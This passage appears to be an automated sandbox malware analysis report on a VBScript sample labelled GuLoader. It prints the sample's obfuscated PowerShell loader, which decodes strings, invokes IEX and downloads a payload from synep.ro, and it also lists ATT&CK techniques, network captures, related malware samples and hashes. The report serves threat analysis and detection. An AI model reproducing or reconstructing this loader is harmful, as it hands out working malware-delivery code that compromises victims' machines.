              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcuJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 321 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 321 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Source | Detection | Scanner | Label | Link
              O1CZjzItH1.vbs | 29% | ReversingLabs | Script-WScript.Trojan.Guloader |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
              https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
              https://go.micro | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
              https://contoso.com/License | 0% | URL Reputation | safe |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              https://aka.ms/pscore68 | 0% | URL Reputation | safe |
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              synep.ro | 31.14.12.249 | true | false | | unknown
              gormezl_6777.6777.6777.677e | unknown | unknown | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              https://synep.ro/Lysbad.psp | false | | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://synep.ro/Lysbad.pspXR | powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.3326639658.0000000004821000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://go.micro | powershell.exe, 00000004.00000002.2161420250.00000280167C9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://synep.ro | powershell.exe, 00000004.00000002.2161420250.000002801798D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://contoso.com/ | powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contoso.com/License | powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contoso.com/Icon | powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2161420250.0000028015C11000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://synep.ro/Lysbad.pspP | powershell.exe, 00000004.00000002.2161420250.0000028015E38000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2161420250.0000028015C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3326639658.0000000004821000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmp | false | |
                              unknown
                              https://synep.ropowershell.exe, 00000004.00000002.2161420250.00000280171C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2161420250.0000028015E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
31.14.12.249 | synep.ro | Romania | 5588 | GTSCEGTSCentralEuropeAntelGermanyCZ | false
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1540050
                                Start date and time:2024-10-23 11:29:22 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 32s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:O1CZjzItH1.vbs
                                renamed because original name is a hash value
                                Original Sample Name:adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959.vbs
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winVBS@9/7@2/1
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 72
                                • Number of non-executed functions: 17
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 3136 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 3228 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: O1CZjzItH1.vbs
Time | Type | Description
05:30:15 | API Interceptor | 89x Sleep call for process: powershell.exe modified
                                No context
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
GTSCEGTSCentralEuropeAntelGermanyCZ | Stima IMP87654 per l'esportazione dell'ultimo trimestre.vbs | malicious | GuLoader | 188.241.183.45
 | la.bot.arm5.elf | malicious | Unknown | 193.85.134.61
 | M3Llib2vh3.elf | malicious | Mirai | 62.168.37.191
 | 6fLnWSoXXD.elf | malicious | Mirai | 94.42.225.72
 | bin.armv7l.elf | malicious | Mirai | 195.144.108.244
 | la.bot.arm.elf | malicious | Unknown | 185.236.86.89
 | TENDER ADDENDUM NO. 01.vbs | malicious | GuLoader | 188.241.183.45
 | Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs | malicious | GuLoader | 188.241.183.45
 | x86_64.nn.elf | malicious | Mirai, Okiru | 157.25.111.135
 | SKM_0001810-01-2024-GL-3762.bat | malicious | Remcos, GuLoader | 89.44.138.129
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Unicredit.Pagamento.pdf.exe | malicious | Remcos | 31.14.12.249
 | Ziraat Bankasi Swift Mesaji,pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 31.14.12.249
 | AmountXpayable.exe | malicious | Snake Keylogger, VIP Keylogger | 31.14.12.249
 | FINAL SHIPPING DOCS.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 31.14.12.249
 | REVISED INVOICE.exe | malicious | Snake Keylogger, VIP Keylogger | 31.14.12.249
 | PO #89230.exe | malicious | AgentTesla | 31.14.12.249
 | Inquiry N_ TM23-10-00.exe | malicious | Snake Keylogger, VIP Keylogger | 31.14.12.249
 | seethebestthingstobegetmebackwithherlove.hta | malicious | Cobalt Strike | 31.14.12.249
 | necgoodthingswithgreatthingsentirethingstobeinonline.hta | malicious | Cobalt Strike | 31.14.12.249
 | veryeasythingsevermadeforcreatenewthignsbetterthigns.hta | malicious | Cobalt Strike, SmokeLoader | 31.14.12.249
                                No context
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:modified
                                Size (bytes):8003
                                Entropy (8bit):4.840877972214509
                                Encrypted:false
                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                MD5:106D01F562D751E62B702803895E93E0
                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1628158735648508
                                Encrypted:false
                                SSDEEP:3:NlllulLhwlz:NllUO
                                MD5:F442CD24937ABD508058EA44FD91378E
                                SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):445008
                                Entropy (8bit):5.860160877436521
                                Encrypted:false
                                SSDEEP:12288:s79x0Y2HZIOtxynkvVGNzDB671ThDB2s9Q:E0x5DtxynkvVGNzDBmtB2s9Q
                                MD5:5AA6003CF7732E15EDC986EFE8119483
                                SHA1:34DE9CBB0AD1CCCD509B05D2AFD00CE76D80B424
                                SHA-256:CFE3BCDDD69CF6FDDD4D04EBA24E8918B1140BF887A509B618AE48AEB708A8C2
                                SHA-512:62720DA12499C803A5A3B03E8E1FF0F20DEC0E1E7F81B85F116DBA45E3440147BD0F2F269A2055357C5DB121D4CA24665E5ED1697AB5092DFAED56EE7581702D
                                Malicious:false
                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):5.151109026985318
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:O1CZjzItH1.vbs
                                File size:30'452 bytes
                                MD5:250e1218609ed0d1e84e24290a5c3759
                                SHA1:cb11233eb647f9731ae643d959fa3f40a483f3aa
                                SHA256:adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959
                                SHA512:11ef0c10a77517dff1757451962f65567287c5c38364a721b30ac3a64276e6116966ce6223dfa6476e5c161490b1d4db390d117f9fb09576f47cd4517852dda5
                                SSDEEP:384:XrCiPWsGHGX54OfdYFFYF2Iq4cS5Jw7lOBG:XeYAGp4S5Jw7lOBG
                                TLSH:5DD24B8AC8CA0FBD19A73BBDC444B4228C7862D2673759702674A4F4781F7935CACDE6
                                File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =
                                Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Oct 23, 2024 11:30:13.966641903 CEST | 56791 | 53 | 192.168.2.5 | 1.1.1.1
                                Oct 23, 2024 11:30:13.981745958 CEST | 53 | 56791 | 1.1.1.1 | 192.168.2.5
                                Oct 23, 2024 11:30:16.775146961 CEST | 63402 | 53 | 192.168.2.5 | 1.1.1.1
                                Oct 23, 2024 11:30:16.926510096 CEST | 53 | 63402 | 1.1.1.1 | 192.168.2.5
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Oct 23, 2024 11:30:13.966641903 CEST | 192.168.2.5 | 1.1.1.1 | 0x5c9b | Standard query (0) | gormezl_6777.6777.6777.677e | A (IP address) | IN (0x0001) | false
                                Oct 23, 2024 11:30:16.775146961 CEST | 192.168.2.5 | 1.1.1.1 | 0x1c9d | Standard query (0) | synep.ro | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Oct 23, 2024 11:30:13.981745958 CEST | 1.1.1.1 | 192.168.2.5 | 0x5c9b | Name error (3) | gormezl_6777.6777.6777.677e | none | none | A (IP address) | IN (0x0001) | false
                                Oct 23, 2024 11:30:16.926510096 CEST | 1.1.1.1 | 192.168.2.5 | 0x1c9d | No error (0) | synep.ro | | 31.14.12.249 | A (IP address) | IN (0x0001) | false
                                • synep.ro
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.5 | 49704 | 31.14.12.249 | 443 | 3136 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-10-23 09:30:17 UTC | 162 | OUT | GET /Lysbad.psp HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                Host: synep.ro
                                Connection: Keep-Alive
                                2024-10-23 09:30:18 UTC | 209 | IN | HTTP/1.1 200 OK
                                Date: Wed, 23 Oct 2024 09:30:18 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 21 Oct 2024 08:56:42 GMT
                                Accept-Ranges: bytes
                                Content-Length: 445008

                                Target ID:0
                                Start time:05:30:12
                                Start date:23/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs"
                                Imagebase:0x7ff79b4c0000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:05:30:13
                                Start date:23/10/2024
                                Path:C:\Windows\System32\PING.EXE
                                Wow64 process (32bit):false
                                Commandline:ping gormezl_6777.6777.6777.677e
                                Imagebase:0x7ff673f20000
                                File size:22'528 bytes
                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:2
                                Start time:05:30:13
                                Start date:23/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:05:30:13
                                Start date:23/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
